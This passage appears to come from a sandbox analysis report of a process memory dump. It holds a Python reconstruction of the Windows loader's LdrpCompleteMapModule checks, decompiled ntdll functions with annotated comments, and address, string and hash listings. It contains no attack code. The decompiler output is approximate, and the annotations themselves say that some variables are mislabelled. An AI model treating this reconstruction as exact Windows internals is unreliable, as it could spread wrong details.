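    if idx >= count:
        return 0, 0
    return struct.unpack_from("<II", data, dirs + idx * 8)


def _rva_to_offset(data, rva):
    """Translate an RVA to a file offset by walking the section table."""
    nt = _nt_headers(data)
    nsec, = struct.unpack_from("<H", data, nt + 6)
    opt_size, = struct.unpack_from("<H", data, nt + 0x14)
    sect = nt + 0x18 + opt_size
    for i in range(nsec):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, sect + i * 40 + 8)
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    raise ValueError("RVA 0x%x is not backed by a section" % rva)


def complete_map_module(data, map_status=STATUS_SUCCESS, forbid_clr=False, require_signed=False):
    """Return (status, ldr_flags, loader_relocates) following the listing's decision path."""
    nt = _nt_headers(data)
    characteristics, = struct.unpack_from("<H", data, nt + 0x16)
    dll_characteristics, = struct.unpack_from("<H", data, nt + 0x5E)
    flags = LDRP_IMAGE_DLL          # assumption: caller pre-set it; cleared below for EXEs

    cor_rva, _ = _directory(data, IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)
    if cor_rva:                                          # CLR image
        if forbid_clr:                                   # *(ctx+0x10) & 0x800000
            return STATUS_INVALID_IMAGE_FORMAT, flags, False
        flags |= LDRP_COR_IMAGE
        cor_flags, = struct.unpack_from("<I", data, _rva_to_offset(data, cor_rva) + 0x10)
        if cor_flags & COMIMAGE_FLAGS_ILONLY:
            flags |= LDRP_COR_IL_ONLY

    if not characteristics & IMAGE_FILE_DLL:             # EXE: drop LDRP_IMAGE_DLL, done
        return STATUS_SUCCESS, flags & ~LDRP_IMAGE_DLL, False

    if require_signed and not dll_characteristics & IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY:
        return STATUS_INVALID_IMAGE_HASH, flags, False   # "Could not validate the crypto signature"

    if flags & LDRP_COR_IL_ONLY:                         # IL-only images get no native relocation
        return STATUS_SUCCESS, flags, False

    # Only STATUS_IMAGE_NOT_AT_BASE makes the loader call its relocation helper;
    # STATUS_IMAGE_AT_DIFFERENT_BASE is traced but needs no fix-ups.
    return STATUS_SUCCESS, flags, map_status == STATUS_IMAGE_NOT_AT_BASE


def build_sample_pe(is_dll=True, force_integrity=False, clr_flags=None):
    """Constructed minimal PE32 (not a real binary): one section at RVA 0x1000 backed by
    file offset 0x200; with clr_flags set, a COR20 header is placed there and directory 14
    points at it."""
    characteristics = 0x0102 | (IMAGE_FILE_DLL if is_dll else 0)  # EXECUTABLE_IMAGE|32BIT_MACHINE
    dllchar = 0x0140 | (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY if force_integrity else 0)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, characteristics)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0x00, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 0x1C, 0x10000000)                  # ImageBase
    struct.pack_into("<II", opt, 0x20, 0x1000, 0x200)              # Section/FileAlignment
    struct.pack_into("<II", opt, 0x38, 0x2000, 0x200)              # SizeOfImage/SizeOfHeaders
    struct.pack_into("<H", opt, 0x46, dllchar)
    struct.pack_into("<I", opt, 0x5C, 16)                          # NumberOfRvaAndSizes
    if clr_flags is not None:
        struct.pack_into("<II", opt, 0x60 + IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR * 8, 0x1000, 0x48)
    sect = struct.pack("<8sIIIIIIHHI", b".text", 0x1000, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + sect).ljust(0x200, b"\0")
    section = bytearray(0x200)
    if clr_flags is not None:   # IMAGE_COR20_HEADER: cb, Major, Minor, MetaData rva/size, Flags
        struct.pack_into("<IHHIII", section, 0, 0x48, 2, 5, 0x1080, 0x40, clr_flags)
    return headers + bytes(section)


if __name__ == "__main__":
    cases = [("native DLL, preferred base", build_sample_pe(), STATUS_SUCCESS),
             ("native DLL, rebased", build_sample_pe(), STATUS_IMAGE_NOT_AT_BASE),
             ("IL-only DLL, rebased", build_sample_pe(clr_flags=COMIMAGE_FLAGS_ILONLY), STATUS_IMAGE_NOT_AT_BASE)]
    for label, pe, st in cases:
        status, flags, reloc = complete_map_module(pe, st)
        print("%-28s status=0x%08X flags=0x%08X loader_relocates=%s" % (label, status, flags, reloc))
```

`require_signed=True` reproduces the path that prints "Could not validate the crypto signature for DLL %wZ" and returns 0xC0000428; the policy bit itself lives in the loader's per-load context, so a DLL without FORCE_INTEGRITY only fails where that context demands signed images.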
                                                       Instruction addresses (the report's per-line address column, one entry per C-code line, 0x00000000 where a line has none): 0x01127e4c through 0x01127f5a and 0x01179848 through 0x01179993.

                                                      Strings
                                                      • LdrpCompleteMapModule, xrefs: 01179898
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01179891
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 011798A2
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 71c0a73879f7c2855a60783f76f51fa384aecf97db522a53c623364acd9cc30d
                                                      • Instruction ID: 76e2e0e3725cb77ef740d060a1cd63be62cf1cb6a60d0ffd492db3a08f538478
                                                      • Opcode Fuzzy Hash: 71c0a73879f7c2855a60783f76f51fa384aecf97db522a53c623364acd9cc30d
                                                      • Instruction Fuzzy Hash: A751F13160476ADBEB2ECB5CC844B6A7BA4BF10328F050599E9619B7E1E730E910CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                       			// Decompiler output for a second function from the same ntdll region. It opens
                                                       			// \Registry\Machine\System\CurrentControlSet\Control\NLS\Language read-only, reads
                                                       			// the REG_SZ value "InstallLanguageFallback", splits it at the first ',' and returns
                                                       			// the two converted tokens through the out parameters __edx and _a4. Several stack
                                                       			// slots are mislabelled by the decompiler (_v36/_v44 serve as both the
                                                       			// UNICODE_STRING and the OBJECT_ATTRIBUTES), so follow the structure, not the names.
                                                       			// Status codes: 0xc000000d STATUS_INVALID_PARAMETER, 0xc0000017 STATUS_NO_MEMORY,
                                                       			// 0xc0000001 STATUS_UNSUCCESSFUL.
                                                       			E0111E620(void* __ecx, short* __edx, short* _a4) {
                                                       				char _v16;
                                                       				char _v20;
                                                       				intOrPtr _v24;
                                                       				char* _v28;
                                                       				char _v32;
                                                       				char _v36;
                                                       				char _v44;
                                                       				signed int _v48;
                                                       				intOrPtr _v52;
                                                       				void* _v56;
                                                       				void* _v60;
                                                       				char _v64;
                                                       				void* _v68;
                                                       				void* _v76;
                                                       				void* _v84;
                                                       				signed int _t59;
                                                       				signed int _t74;
                                                       				signed short* _t75;
                                                       				signed int _t76;
                                                       				signed short* _t78;
                                                       				void* _t80;                                          // missing from the decompiler output
                                                       				signed int _t83;
                                                       				signed int _t84;                                     // missing from the decompiler output
                                                       				short* _t93;
                                                       				signed short* _t94;
                                                       				short* _t96;
                                                       				void* _t97;
                                                       				signed int _t99;
                                                       				void* _t101;
                                                       				void* _t102;
                                                       
                                                       				_t80 = __ecx;
                                                       				_t101 = (_t99 & 0xfffffff8) - 0x34;                  // 8-byte aligned stack frame
                                                       				_t96 = __edx;                                        // first out parameter
                                                       				_v44 = __edx;
                                                       				_t78 = 0;
                                                       				_v56 = 0;
                                                       				if(__ecx == 0 || __edx == 0) {
                                                       					L28:
                                                       					_t97 = 0xc000000d;                                // STATUS_INVALID_PARAMETER
                                                       				} else {
                                                       					_t93 = _a4;                                       // second out parameter
                                                       					if(_t93 == 0) {
                                                       						goto L28;
                                                       					}
                                                       					_t78 = E0111F358(__ecx, 0xac);                    // heap buffer for the value data (0xac WCHARs)
                                                       					if(_t78 == 0) {
                                                       						_t97 = 0xc0000017;                            // STATUS_NO_MEMORY
                                                       						L6:
                                                       						// common exit: close the key handle and free the buffer
                                                       						if(_v56 != 0) {
                                                       							_push(_v56);
                                                       							E011595D0();                                  // NtClose-style
                                                       						}
                                                       						if(_t78 != 0) {
                                                       							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);   // RtlFreeHeap(PEB->ProcessHeap, 0, buf)
                                                       						}
                                                       						return _t97;
                                                       					}
                                                       					E0115FA60(_t78, 0, 0x158);                        // memset(buf, 0, 0xac * sizeof(WCHAR))
                                                       					_v48 = _v48 & 0x00000000;
                                                       					_t102 = _t101 + 0xc;
                                                       					 *_t96 = 0;                                        // both outputs default to 0
                                                       					 *_t93 = 0;
                                                       					E0115BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");   // RtlInitUnicodeString-style
                                                       					_v36 = 0x18;                                      // OBJECT_ATTRIBUTES.Length
                                                       					_v28 =  &_v44;                                    // ObjectName
                                                       					_v64 = 0;
                                                       					_push( &_v36);                                    // ObjectAttributes
                                                       					_push(0x20019);                                   // KEY_READ
                                                       					_v32 = 0;                                         // RootDirectory
                                                       					_push( &_v64);                                    // receives the key handle
                                                       					_v24 = 0x40;                                      // OBJ_CASE_INSENSITIVE
                                                       					_v20 = 0;
                                                       					_v16 = 0;
                                                       					_t97 = E01159600();                               // NtOpenKey-style
                                                       					if(_t97 < 0) {
                                                       						goto L6;
                                                       					}
                                                       					E0115BB40(0,  &_v36, L"InstallLanguageFallback");  // value name
                                                       					_push(0);
                                                       					_v48 = 4;
                                                       					_t97 = L0111F018(_v64,  &_v44,  &_v56, _t78,  &_v48);   // query the value into buf
                                                       					if(_t97 >= 0) {
                                                       						if(_v52 != 1) {                               // value type must be REG_SZ (1)
                                                       							L17:
                                                       							_t97 = 0xc0000001;                        // STATUS_UNSUCCESSFUL
                                                       							goto L6;
                                                       						}
                                                       						_t59 =  *_t78 & 0x0000ffff;                   // first WCHAR of the value
                                                       						_t94 = _t78;
                                                       						_t83 = _t59;
                                                       						if(_t59 == 0) {
                                                       							L19:
                                                       							if(_t83 == 0) {
                                                       								L23:
                                                       								// convert the first token (buf) and store it in *__edx
                                                       								E0115BB40(_t83, _t102 + 0x24, _t78);
                                                       								if(L011243C0( &_v48,  &_v64) == 0) {
                                                       									goto L17;
                                                       								}
                                                       								_t84 = _v48;
                                                       								 *_v48 = _v56;
                                                       								// convert the second token (after the comma and spaces) into *_a4
                                                       								if( *_t94 != 0) {
                                                       									E0115BB40(_t84, _t102 + 0x24, _t94);
                                                       									if(L011243C0( &_v48,  &_v64) != 0) {
                                                       										 *_a4 = _v56;
                                                       									} else {
                                                       										_t97 = 0xc0000001;
                                                       										 *_v48 = 0;                        // a bad second token also clears the first
                                                       									}
                                                       								}
                                                       								goto L6;
                                                       							}
                                                       							// skip the spaces (0x20) that follow the comma
                                                       							_t83 = _t83 & 0x0000ffff;
                                                       							while(_t83 == 0x20) {
                                                       								_t94 =  &(_t94[1]);
                                                       								_t74 =  *_t94 & 0x0000ffff;
                                                       								_t83 = _t74;
                                                       								if(_t74 != 0) {
                                                       									continue;
                                                       								}
                                                       								goto L23;
                                                       							}
                                                       							goto L23;
                                                       						} else {
                                                       							goto L14;
                                                       						}
                                                       						// scan forward to the first ',' (0x2c) or the terminating NUL
                                                       						while(1) {
                                                       							L14:
                                                       							_t27 =  &(_t94[1]); // 0x2
                                                       							_t75 = _t27;
                                                       							if(_t83 == 0x2c) {
                                                       								break;
                                                       							}
                                                       							_t94 = _t75;
                                                       							_t76 =  *_t94 & 0x0000ffff;
                                                       							_t83 = _t76;
                                                       							if(_t76 != 0) {
                                                       								continue;
                                                       							}
                                                       							goto L23;
                                                       						}
                                                       						 *_t94 = 0;                                    // terminate the first token at the comma
                                                       						_t94 = _t75;                                   // second token starts after it
                                                       						_t83 =  *_t75 & 0x0000ffff;
                                                       						goto L19;
                                                       					}
                                                       				}
                                                       			}
                                                       Instruction addresses (the report's per-line address column, one entry per C-code line, 0x00000000 where a line has none): 0x0111e620 through 0x0111e743 and 0x01175403 through 0x011754fb.
                                                      0x011754eb
                                                      0x011754de
                                                      0x00000000
                                                      0x011754bc
                                                      0x01175477
                                                      0x0117547a
                                                      0x01175480
                                                      0x01175483
                                                      0x01175486
                                                      0x0117548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0117548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01175447
                                                      0x01175447
                                                      0x01175447
                                                      0x01175447
                                                      0x0117544e
                                                      0x00000000
                                                      0x00000000
                                                      0x01175450
                                                      0x01175452
                                                      0x01175455
                                                      0x0117545a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0117545c
                                                      0x0117546a
                                                      0x0117546d
                                                      0x0117546f
                                                      0x00000000
                                                      0x0117546f
                                                      0x0111e70f

                                                      Strings
                                                      • @, xrefs: 0111E6C0
                                                      • InstallLanguageFallback, xrefs: 0111E6DB
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0111E68C
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: 1eea9b5708da2e7f85521cef50e5586abc97d3ed84215479008775f9a50a2030
                                                      • Instruction ID: 968fa5455a445d0f512e4d87a4b86fa5177e00eeb3cd0f5ec91409ce10b8fc03
                                                      • Opcode Fuzzy Hash: 1eea9b5708da2e7f85521cef50e5586abc97d3ed84215479008775f9a50a2030
                                                      • Instruction Fuzzy Hash: 1451B1726093469BD759DF68C440A6BB7FABF88618F05092EF986D7340FB34D904C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E011DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v40;
                                                      				char _v44;
                                                      				intOrPtr _v48;
                                                      				signed int _v52;
                                                      				unsigned int _v56;
                                                      				char _v60;
                                                      				signed int _v64;
                                                      				char _v68;
                                                      				signed int _v72;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				char _t87;
                                                      				signed int _t90;
                                                      				signed int _t94;
                                                      				signed int _t100;
                                                      				intOrPtr* _t113;
                                                      				signed int _t122;
                                                      				void* _t132;
                                                      				void* _t135;
                                                      				signed int _t139;
                                                      				signed int* _t141;
                                                      				signed int _t146;
                                                      				signed int _t147;
                                                      				void* _t153;
                                                      				signed int _t155;
                                                      				signed int _t159;
                                                      				char _t166;
                                                      				void* _t172;
                                                      				void* _t176;
                                                      				signed int _t177;
                                                      				intOrPtr* _t179;
                                                      
                                                      				_t179 = __ecx;
                                                      				_v48 = __edx;
                                                      				_v68 = 0;
                                                      				_v72 = 0;
                                                      				_push(__ecx[1]);
                                                      				_push( *__ecx);
                                                      				_push(0);
                                                      				_t153 = 0x14;
                                                      				_t135 = _t153;
                                                      				_t132 = E011DBBBB(_t135, _t153);
                                                      				if(_t132 == 0) {
                                                      					_t166 = _v68;
                                                      					goto L43;
                                                      				} else {
                                                      					_t155 = 0;
                                                      					_v52 = 0;
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					asm("stosd");
                                                      					_v56 = __ecx[1];
                                                      					if( *__ecx >> 8 < 2) {
                                                      						_t155 = 1;
                                                      						_v52 = 1;
                                                      					}
                                                      					_t139 = _a4;
                                                      					_t87 = (_t155 << 0xc) + _t139;
                                                      					_v60 = _t87;
                                                      					if(_t87 < _t139) {
                                                      						L11:
                                                      						_t166 = _v68;
                                                      						L12:
                                                      						if(_t132 != 0) {
                                                      							E011DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                      						}
                                                      						L43:
                                                      						if(_v72 != 0) {
                                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                                      							_push( *_t179);
                                                      							_push(0x8000);
                                                      							E011DAFDE( &_v72,  &_v60);
                                                      						}
                                                      						L46:
                                                      						return _t166;
                                                      					}
                                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                      					asm("sbb edi, edi");
                                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                      					if(_t90 != 0) {
                                                      						_push(0);
                                                      						_push(0x14);
                                                      						_push( &_v44);
                                                      						_push(3);
                                                      						_push(_t179);
                                                      						_push(0xffffffff);
                                                      						if(E01159730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                      							_push(_t139);
                                                      							E011DA80D(_t179, 1, _v40, 0);
                                                      							_t172 = 4;
                                                      						}
                                                      					}
                                                      					_t141 =  &_v72;
                                                      					if(E011DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                      						_v64 = _a4;
                                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                      						asm("sbb edi, edi");
                                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                      						if(_t94 != 0) {
                                                      							_push(0);
                                                      							_push(0x14);
                                                      							_push( &_v24);
                                                      							_push(3);
                                                      							_push(_t179);
                                                      							_push(0xffffffff);
                                                      							if(E01159730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                      								_push(_t141);
                                                      								E011DA80D(_t179, 1, _v20, 0);
                                                      								_t176 = 4;
                                                      							}
                                                      						}
                                                      						if(E011DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                      							goto L11;
                                                      						} else {
                                                      							_t177 = _v64;
                                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                      							_t100 = _v52 + _v52;
                                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                      							 *(_t132 + 0x10) = _t146;
                                                      							asm("bsf eax, [esp+0x18]");
                                                      							_v52 = _t100;
                                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                      							_t47 =  &_a8;
                                                      							 *_t47 = _a8 & 0x00000001;
                                                      							if( *_t47 == 0) {
                                                      								E01132280(_t179 + 0x30, _t179 + 0x30);
                                                      							}
                                                      							_t147 =  *(_t179 + 0x34);
                                                      							_t159 =  *(_t179 + 0x38) & 1;
                                                      							_v68 = 0;
                                                      							if(_t147 == 0) {
                                                      								L35:
                                                      								E0112B090(_t179 + 0x34, _t147, _v68, _t132);
                                                      								if(_a8 == 0) {
                                                      									E0112FFB0(_t132, _t177, _t179 + 0x30);
                                                      								}
                                                      								asm("lock xadd [eax], ecx");
                                                      								asm("lock xadd [eax], edx");
                                                      								_t132 = 0;
                                                      								_v72 = _v72 & 0;
                                                      								_v68 = _v72;
                                                      								if(E01137D50() == 0) {
                                                      									_t113 = 0x7ffe0388;
                                                      								} else {
                                                      									_t177 = _v64;
                                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                      								}
                                                      								if( *_t113 == _t132) {
                                                      									_t166 = _v68;
                                                      									goto L46;
                                                      								} else {
                                                      									_t166 = _v68;
                                                      									E011CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                      									goto L12;
                                                      								}
                                                      							} else {
                                                      								L23:
                                                      								while(1) {
                                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                      										_t122 =  *_t147;
                                                      										if(_t159 == 0) {
                                                      											L32:
                                                      											if(_t122 == 0) {
                                                      												L34:
                                                      												_v68 = 0;
                                                      												goto L35;
                                                      											}
                                                      											L33:
                                                      											_t147 = _t122;
                                                      											continue;
                                                      										}
                                                      										if(_t122 == 0) {
                                                      											goto L34;
                                                      										}
                                                      										_t122 = _t122 ^ _t147;
                                                      										goto L32;
                                                      									}
                                                      									_t122 =  *(_t147 + 4);
                                                      									if(_t159 == 0) {
                                                      										L27:
                                                      										if(_t122 != 0) {
                                                      											goto L33;
                                                      										}
                                                      										L28:
                                                      										_v68 = 1;
                                                      										goto L35;
                                                      									}
                                                      									if(_t122 == 0) {
                                                      										goto L28;
                                                      									}
                                                      									_t122 = _t122 ^ _t147;
                                                      									goto L27;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					_v72 = _v72 & 0x00000000;
                                                      					goto L11;
                                                      				}
                                                      			}

                                                      0x011de547
                                                      0x011de549
                                                      0x011de54f
                                                      0x011de553
                                                      0x011de557
                                                      0x011de55a
                                                      0x011de55c
                                                      0x011de55f
                                                      0x011de561
                                                      0x011de567
                                                      0x011de56b
                                                      0x011de7e2
                                                      0x00000000
                                                      0x011de571
                                                      0x011de575
                                                      0x011de577
                                                      0x011de57b
                                                      0x011de57c
                                                      0x011de57d
                                                      0x011de57e
                                                      0x011de57f
                                                      0x011de588
                                                      0x011de58f
                                                      0x011de591
                                                      0x011de592
                                                      0x011de592
                                                      0x011de596
                                                      0x011de59e
                                                      0x011de5a0
                                                      0x011de5a6
                                                      0x011de61d
                                                      0x011de61d
                                                      0x011de621
                                                      0x011de623
                                                      0x011de630
                                                      0x011de630
                                                      0x011de7e6
                                                      0x011de7eb
                                                      0x011de7ed
                                                      0x011de7f4
                                                      0x011de7fa
                                                      0x011de7ff
                                                      0x011de7ff
                                                      0x011de80a
                                                      0x011de812
                                                      0x011de812
                                                      0x011de5ab
                                                      0x011de5b4
                                                      0x011de5b9
                                                      0x011de5be
                                                      0x011de5c0
                                                      0x011de5c2
                                                      0x011de5c8
                                                      0x011de5c9
                                                      0x011de5cb
                                                      0x011de5cc
                                                      0x011de5d5
                                                      0x011de5e4
                                                      0x011de5f1
                                                      0x011de5f8
                                                      0x011de5f8
                                                      0x011de5d5
                                                      0x011de602
                                                      0x011de616
                                                      0x011de63d
                                                      0x011de644
                                                      0x011de64d
                                                      0x011de652
                                                      0x011de657
                                                      0x011de659
                                                      0x011de65b
                                                      0x011de661
                                                      0x011de662
                                                      0x011de664
                                                      0x011de665
                                                      0x011de66e
                                                      0x011de67d
                                                      0x011de68a
                                                      0x011de691
                                                      0x011de691
                                                      0x011de66e
                                                      0x011de6b0
                                                      0x00000000
                                                      0x011de6b6
                                                      0x011de6bd
                                                      0x011de6c7
                                                      0x011de6d7
                                                      0x011de6d9
                                                      0x011de6db
                                                      0x011de6de
                                                      0x011de6e3
                                                      0x011de6f3
                                                      0x011de6fc
                                                      0x011de700
                                                      0x011de700
                                                      0x011de704
                                                      0x011de70a
                                                      0x011de70a
                                                      0x011de713
                                                      0x011de716
                                                      0x011de719
                                                      0x011de720
                                                      0x011de761
                                                      0x011de76b
                                                      0x011de774
                                                      0x011de77a
                                                      0x011de77a
                                                      0x011de78a
                                                      0x011de791
                                                      0x011de799
                                                      0x011de79b
                                                      0x011de79f
                                                      0x011de7aa
                                                      0x011de7c0
                                                      0x011de7ac
                                                      0x011de7b2
                                                      0x011de7b9

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: 33d9e513aeb625fe8bdad0c28ab2415d6c8faf1009fa8f6ccef01e38d8ae1ed6
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: 4791C2312057429FE768CF29C841B5BBBE5BF84715F15892DFA99CB280E774E804CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 77%
                                                      			E011951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed short* _t63;
                                                      				signed int _t64;
                                                      				signed int _t65;
                                                      				signed int _t67;
                                                      				intOrPtr _t74;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t88;
                                                      				intOrPtr _t94;
                                                      				void* _t100;
                                                      				void* _t103;
                                                      				intOrPtr _t105;
                                                      				signed int _t106;
                                                      				short* _t108;
                                                      				signed int _t110;
                                                      				signed int _t113;
                                                      				signed int* _t115;
                                                      				signed short* _t117;
                                                      				void* _t118;
                                                      				void* _t119;
                                                      
                                                      				_push(0x80);
                                                      				_push(0x11f05f0);
                                                      				E0116D0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                      				_t115 =  *(_t118 + 0xc);
                                                      				 *(_t118 - 0x7c) = _t115;
                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                      				_t113 = 0;
                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                      				_t100 = __ecx;
                                                      				if(_t100 == 0) {
                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                      					E0112EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                      					_t63 =  *(_t118 - 0x90);
                                                      					_t101 = _t63[2];
                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                      					L20:
                                                      					_t65 = _t64 >> 1;
                                                      					L21:
                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                      					if(_t108 == 0) {
                                                      						L27:
                                                      						 *_t115 = _t65 + 1;
                                                      						_t67 = 0xc0000023;
                                                      						L28:
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                      						L29:
                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                      						E011953CA(0);
                                                      						return E0116D130(0, _t113, _t115);
                                                      					}
                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                      							 *_t108 = 0;
                                                      						}
                                                      						goto L27;
                                                      					}
                                                      					 *_t115 = _t65;
                                                      					_t115 = _t65 + _t65;
                                                      					E0115F3E0(_t108, _t101, _t115);
                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                      					_t67 = 0;
                                                      					goto L28;
                                                      				}
                                                      				_t103 = _t100 - 1;
                                                      				if(_t103 == 0) {
                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                      					_t74 = E01133690(1, _t117, 0x10f1810, _t118 - 0x74);
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                      					_t101 = _t117[2];
                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                      					if(_t74 < 0) {
                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                      						_t115 =  *(_t118 - 0x7c);
                                                      						goto L20;
                                                      					}
                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                      					_t115 =  *(_t118 - 0x7c);
                                                      					goto L21;
                                                      				}
                                                      				if(_t103 == 1) {
                                                      					_t105 = 4;
                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                      					_push(_t118 - 0x70);
                                                      					_push(0);
                                                      					_push(0);
                                                      					_push(_t105);
                                                      					_push(_t118 - 0x78);
                                                      					_push(0x6b);
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E0115AA90();
                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                      					_t113 = L01134620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                      					if(_t113 != 0) {
                                                      						_push(_t118 - 0x70);
                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                      						_push(_t113);
                                                      						_push(4);
                                                      						_push(_t118 - 0x78);
                                                      						_push(0x6b);
                                                      						_t84 = E0115AA90();
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                      						if(_t84 < 0) {
                                                      							goto L29;
                                                      						}
                                                      						_t110 = 0;
                                                      						_t106 = 0;
                                                      						while(1) {
                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                      							 *(_t118 - 0x88) = _t106;
                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                      								break;
                                                      							}
                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                      							_t106 = _t106 + 1;
                                                      						}
                                                      						_t88 = E0119500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                      						_t119 = _t119 + 0x1c;
                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                      						if(_t88 < 0) {
                                                      							goto L29;
                                                      						}
